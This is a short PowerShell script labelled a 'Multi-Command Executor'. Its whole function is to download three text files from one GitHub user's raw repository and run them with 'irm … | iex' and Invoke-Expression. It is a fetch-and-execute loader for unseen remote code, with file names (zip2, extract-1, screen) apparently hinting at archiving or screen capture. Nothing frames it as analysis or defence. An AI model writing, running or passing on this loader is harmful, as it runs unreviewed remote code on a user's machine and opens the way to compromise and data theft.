# PowerShell Multi-Command Executor
$commands = @(
    'irm https://raw.githubusercontent.com/bunny1233/mynewscripts/main/zip2.txt | iex',
    'irm https://raw.githubusercontent.com/bunny1233/mynewscripts/main/extract-1.txt | iex',
    'irm https://raw.githubusercontent.com/bunny1233/mynewscripts/main/screen.txt | iex'
)

Write-Host "PowerShell Multi-Command Executor" -ForegroundColor Cyan
Write-Host "=================================" -ForegroundColor Cyan

foreach ($cmd in $commands) {
    Write-Host "`nExecuting: $cmd" -ForegroundColor Yellow
    Write-Host "---------------------------------" -ForegroundColor Gray
    
    # Execute the command
    Invoke-Expression $cmd
    
    Write-Host "---------------------------------" -ForegroundColor Gray
}

Write-Host "`nAll commands executed!" -ForegroundColor Green
